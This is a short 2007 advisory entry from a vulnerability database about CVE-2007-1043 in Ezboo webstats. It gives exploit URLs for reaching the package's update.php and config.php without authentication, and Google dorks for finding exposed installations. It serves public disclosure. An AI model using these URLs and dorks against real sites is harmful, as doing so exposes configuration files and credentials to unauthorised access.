Bug: Ezboo webstats acces to sensitive files ( Ascii Version )

Search:
WLB2

Ezboo webstats acces to sensitive files

Published
Credit
Risk
2007.02.23
sn0oPy
Medium
CWE
CVE
Local
Remote
N/A
CVE-2007-1043
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

* Ezboo webstats acces to sensitive files

* By : sn0oPy

* Risk : medium

* site : http://www.ezboo.com/softs

* exploit :

juste add this files to the url :

http://www.target.ma/ezwebstats/update.php
http://www.target.ma/ezwebstats/config.php

Dork :

inurl:"/ezWebStats/"
intitle:"ezBOO WebStats"

* contact : sn0oPy (at) avenir-geopolitique (dot) net [email concealed]

* greetz : [subzero], http://forums.avenir-geopolitique.net.

* reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2674

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version